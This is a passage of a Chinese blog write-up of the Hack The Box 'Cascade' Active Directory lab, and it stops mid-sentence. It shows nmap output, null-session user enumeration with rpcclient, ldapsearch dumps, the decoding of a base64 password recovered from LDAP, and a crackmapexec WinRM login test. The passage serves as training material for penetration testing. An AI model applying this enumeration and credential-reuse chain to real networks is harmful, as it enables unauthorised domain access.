AD-Cascade
0x00 前言
本小白最近在学域渗透,决定把Hack The Box的Active Directory 101
系列域渗透靶机打完,并详细记录当中用到的工具、知识点及其背后的原理。本篇文章是该系列的第八篇,靶机名字为Cascade。
0x01 信息搜集
Nmap scan report for 10.10.10.182
Host is up (0.23s latency).
Not shown: 65520 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-11-29 03:19:33Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49170/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -1s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-11-29T03:20:40
|_ start_date: 2022-11-29T01:11:22
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1282.33 seconds
从上面nmap扫描结果中我们可以提取到一个域名:cascade.local
接下来上市rpc空连接,发现可以连上,并且成功枚举得到了很多用户名
rpcclient -U '' -N 10.10.10.182
CascGuest
arksvc
s.smith]
r.thompson
util
j.wakefield
s.hickson
j.goodhand
a.turnbull
e.crowe
b.hanson
d.burman
BackupSvc
j.allen
i.croft
尝试使用ldapsearch进行信息搜集
ldapsearch -x -b "dc=cascade,dc=local" -H ldap://10.10.10.182 >result.txt
ldapsearch -x -b "DC=cascade,DC=local" '(objectClass=person)' -H ldap://10.10.10.182 > ldap-people.txt
成功在搜集的结果中找到了r.thompson用户的密码
echo clk0bjVldmE= |base64 -d
#得到用户r.thompson的密码:rY4n5eva
crackmapexec winrm 10.10.10.182 -u r.thompson -p rY4n5eva
测试发现无